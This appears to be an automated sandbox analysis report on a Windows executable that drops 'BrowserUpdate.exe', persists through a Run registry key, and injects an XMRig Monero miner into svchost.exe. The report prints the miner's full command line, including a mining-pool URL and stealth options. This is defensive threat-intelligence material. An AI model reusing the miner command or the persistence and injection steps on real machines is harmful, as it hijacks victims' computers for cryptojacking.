Analysis
-
max time kernel
142s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system -
submitted
25-11-2022 09:31
Static task
static1
Behavioral task
behavioral1
Sample
2276decf1e3a971157aedf6455c79109c30e9871b17e4cbf5d4305353cc014ef.exe
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
2276decf1e3a971157aedf6455c79109c30e9871b17e4cbf5d4305353cc014ef.exe
Resource
win10v2004-20220901-en
General
-
Target
2276decf1e3a971157aedf6455c79109c30e9871b17e4cbf5d4305353cc014ef.exe
-
Size
2.1MB
-
MD5
457115eb0e95e1377f8beaa00b545871
-
SHA1
9cb01f9d44134355f9f55cf68ef02740e2aee8f0
-
SHA256
2276decf1e3a971157aedf6455c79109c30e9871b17e4cbf5d4305353cc014ef
-
SHA512
55328834359be46e42b34afa96c89fc26a52928768bd6ecff0a49f5d823d97e3e3d3b3f53e6de9a18549856517d8ccfc1e9cc363e6360a91fa0ea7aa9a36ce5a
-
SSDEEP
49152:Uzb5vW78fienXiALMq/09Jbqj0s/YYP6mN:IxhieXt09jaIm
Malware Config
Signatures
-
XMRig Miner payload 6 IoCs
Processes:
resource yara_rule behavioral2/memory/824-141-0x0000000140000000-0x000000014072E000-memory.dmp xmrig behavioral2/memory/824-142-0x00000001402CCBC8-mapping.dmp xmrig behavioral2/memory/824-144-0x0000000140000000-0x000000014072E000-memory.dmp xmrig behavioral2/memory/824-145-0x0000000140000000-0x000000014072E000-memory.dmp xmrig behavioral2/memory/824-147-0x0000000140000000-0x000000014072E000-memory.dmp xmrig behavioral2/memory/824-148-0x0000000140000000-0x000000014072E000-memory.dmp xmrig -
Executes dropped EXE 1 IoCs
Processes:
BrowserUpdate.exepid process 220 BrowserUpdate.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
2276decf1e3a971157aedf6455c79109c30e9871b17e4cbf5d4305353cc014ef.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation 2276decf1e3a971157aedf6455c79109c30e9871b17e4cbf5d4305353cc014ef.exe -
Cryptocurrency Miner
Makes network request to known mining pool URL.
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
2276decf1e3a971157aedf6455c79109c30e9871b17e4cbf5d4305353cc014ef.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BrowserUpdate.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\BrowserUpdate.exe" 2276decf1e3a971157aedf6455c79109c30e9871b17e4cbf5d4305353cc014ef.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
BrowserUpdate.exedescription pid process target process PID 220 set thread context of 824 220 BrowserUpdate.exe svchost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 23 IoCs
Processes:
2276decf1e3a971157aedf6455c79109c30e9871b17e4cbf5d4305353cc014ef.exepid process 4252 2276decf1e3a971157aedf6455c79109c30e9871b17e4cbf5d4305353cc014ef.exe 4252 2276decf1e3a971157aedf6455c79109c30e9871b17e4cbf5d4305353cc014ef.exe 4252 2276decf1e3a971157aedf6455c79109c30e9871b17e4cbf5d4305353cc014ef.exe 4252 2276decf1e3a971157aedf6455c79109c30e9871b17e4cbf5d4305353cc014ef.exe 4252 2276decf1e3a971157aedf6455c79109c30e9871b17e4cbf5d4305353cc014ef.exe 4252 2276decf1e3a971157aedf6455c79109c30e9871b17e4cbf5d4305353cc014ef.exe 4252 2276decf1e3a971157aedf6455c79109c30e9871b17e4cbf5d4305353cc014ef.exe 4252 2276decf1e3a971157aedf6455c79109c30e9871b17e4cbf5d4305353cc014ef.exe 4252 2276decf1e3a971157aedf6455c79109c30e9871b17e4cbf5d4305353cc014ef.exe 4252 2276decf1e3a971157aedf6455c79109c30e9871b17e4cbf5d4305353cc014ef.exe 4252 2276decf1e3a971157aedf6455c79109c30e9871b17e4cbf5d4305353cc014ef.exe 4252 2276decf1e3a971157aedf6455c79109c30e9871b17e4cbf5d4305353cc014ef.exe 4252 2276decf1e3a971157aedf6455c79109c30e9871b17e4cbf5d4305353cc014ef.exe 4252 2276decf1e3a971157aedf6455c79109c30e9871b17e4cbf5d4305353cc014ef.exe 4252 2276decf1e3a971157aedf6455c79109c30e9871b17e4cbf5d4305353cc014ef.exe 4252 2276decf1e3a971157aedf6455c79109c30e9871b17e4cbf5d4305353cc014ef.exe 4252 2276decf1e3a971157aedf6455c79109c30e9871b17e4cbf5d4305353cc014ef.exe 4252 2276decf1e3a971157aedf6455c79109c30e9871b17e4cbf5d4305353cc014ef.exe 4252 2276decf1e3a971157aedf6455c79109c30e9871b17e4cbf5d4305353cc014ef.exe 4252 2276decf1e3a971157aedf6455c79109c30e9871b17e4cbf5d4305353cc014ef.exe 4252 2276decf1e3a971157aedf6455c79109c30e9871b17e4cbf5d4305353cc014ef.exe 4252 2276decf1e3a971157aedf6455c79109c30e9871b17e4cbf5d4305353cc014ef.exe 4252 2276decf1e3a971157aedf6455c79109c30e9871b17e4cbf5d4305353cc014ef.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
2276decf1e3a971157aedf6455c79109c30e9871b17e4cbf5d4305353cc014ef.exeBrowserUpdate.exesvchost.exedescription pid process Token: SeDebugPrivilege 4252 2276decf1e3a971157aedf6455c79109c30e9871b17e4cbf5d4305353cc014ef.exe Token: SeDebugPrivilege 220 BrowserUpdate.exe Token: SeLockMemoryPrivilege 824 svchost.exe Token: SeLockMemoryPrivilege 824 svchost.exe -
Suspicious use of WriteProcessMemory 17 IoCs
Processes:
2276decf1e3a971157aedf6455c79109c30e9871b17e4cbf5d4305353cc014ef.exeBrowserUpdate.exedescription pid process target process PID 4252 wrote to memory of 220 4252 2276decf1e3a971157aedf6455c79109c30e9871b17e4cbf5d4305353cc014ef.exe BrowserUpdate.exe PID 4252 wrote to memory of 220 4252 2276decf1e3a971157aedf6455c79109c30e9871b17e4cbf5d4305353cc014ef.exe BrowserUpdate.exe PID 220 wrote to memory of 824 220 BrowserUpdate.exe svchost.exe PID 220 wrote to memory of 824 220 BrowserUpdate.exe svchost.exe PID 220 wrote to memory of 824 220 BrowserUpdate.exe svchost.exe PID 220 wrote to memory of 824 220 BrowserUpdate.exe svchost.exe PID 220 wrote to memory of 824 220 BrowserUpdate.exe svchost.exe PID 220 wrote to memory of 824 220 BrowserUpdate.exe svchost.exe PID 220 wrote to memory of 824 220 BrowserUpdate.exe svchost.exe PID 220 wrote to memory of 824 220 BrowserUpdate.exe svchost.exe PID 220 wrote to memory of 824 220 BrowserUpdate.exe svchost.exe PID 220 wrote to memory of 824 220 BrowserUpdate.exe svchost.exe PID 220 wrote to memory of 824 220 BrowserUpdate.exe svchost.exe PID 220 wrote to memory of 824 220 BrowserUpdate.exe svchost.exe PID 220 wrote to memory of 824 220 BrowserUpdate.exe svchost.exe PID 220 wrote to memory of 824 220 BrowserUpdate.exe svchost.exe PID 220 wrote to memory of 824 220 BrowserUpdate.exe svchost.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\2276decf1e3a971157aedf6455c79109c30e9871b17e4cbf5d4305353cc014ef.exe"C:\Users\Admin\AppData\Local\Temp\2276decf1e3a971157aedf6455c79109c30e9871b17e4cbf5d4305353cc014ef.exe"1⤵
- Checks computer location settings
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4252 -
C:\Users\Admin\AppData\Local\Temp\BrowserUpdate.exe"C:\Users\Admin\AppData\Local\Temp\BrowserUpdate.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:220 -
C:\WINDOWS\System32\svchost.exeC:\WINDOWS\System32\svchost.exe -B --coin=monero --asm=auto --cpu-memory-pool=-1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=stratum+tcp://xmr.pool.minergate.com:45700 [email protected] --pass= --cpu-max-threads-hint=40 --donate-level=5 --unam-idle-wait=5 --unam-idle-cpu=90 --unam-stealth3⤵
- Suspicious use of AdjustPrivilegeToken
PID:824
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\BrowserUpdate.exeFilesize
2.1MB
MD5457115eb0e95e1377f8beaa00b545871
SHA19cb01f9d44134355f9f55cf68ef02740e2aee8f0
SHA2562276decf1e3a971157aedf6455c79109c30e9871b17e4cbf5d4305353cc014ef
SHA51255328834359be46e42b34afa96c89fc26a52928768bd6ecff0a49f5d823d97e3e3d3b3f53e6de9a18549856517d8ccfc1e9cc363e6360a91fa0ea7aa9a36ce5a
-
C:\Users\Admin\AppData\Local\Temp\BrowserUpdate.exeFilesize
2.1MB
MD5457115eb0e95e1377f8beaa00b545871
SHA19cb01f9d44134355f9f55cf68ef02740e2aee8f0
SHA2562276decf1e3a971157aedf6455c79109c30e9871b17e4cbf5d4305353cc014ef
SHA51255328834359be46e42b34afa96c89fc26a52928768bd6ecff0a49f5d823d97e3e3d3b3f53e6de9a18549856517d8ccfc1e9cc363e6360a91fa0ea7aa9a36ce5a
-
memory/220-140-0x00007FF8F91E0000-0x00007FF8F9CA1000-memory.dmpFilesize
10.8MB
-
memory/220-139-0x0000000002DB0000-0x0000000002DC2000-memory.dmpFilesize
72KB
-
memory/220-134-0x0000000000000000-mapping.dmp
-
memory/220-143-0x00007FF8F91E0000-0x00007FF8F9CA1000-memory.dmpFilesize
10.8MB
-
memory/220-138-0x00007FF8F91E0000-0x00007FF8F9CA1000-memory.dmpFilesize
10.8MB
-
memory/824-141-0x0000000140000000-0x000000014072E000-memory.dmpFilesize
7.2MB
-
memory/824-142-0x00000001402CCBC8-mapping.dmp
-
memory/824-144-0x0000000140000000-0x000000014072E000-memory.dmpFilesize
7.2MB
-
memory/824-145-0x0000000140000000-0x000000014072E000-memory.dmpFilesize
7.2MB
-
memory/824-146-0x00000273773D0000-0x00000273773E4000-memory.dmpFilesize
80KB
-
memory/824-147-0x0000000140000000-0x000000014072E000-memory.dmpFilesize
7.2MB
-
memory/824-148-0x0000000140000000-0x000000014072E000-memory.dmpFilesize
7.2MB
-
memory/4252-132-0x0000000000250000-0x0000000000470000-memory.dmpFilesize
2.1MB
-
memory/4252-133-0x00007FF8F91E0000-0x00007FF8F9CA1000-memory.dmpFilesize
10.8MB
-
memory/4252-137-0x00007FF8F91E0000-0x00007FF8F9CA1000-memory.dmpFilesize
10.8MB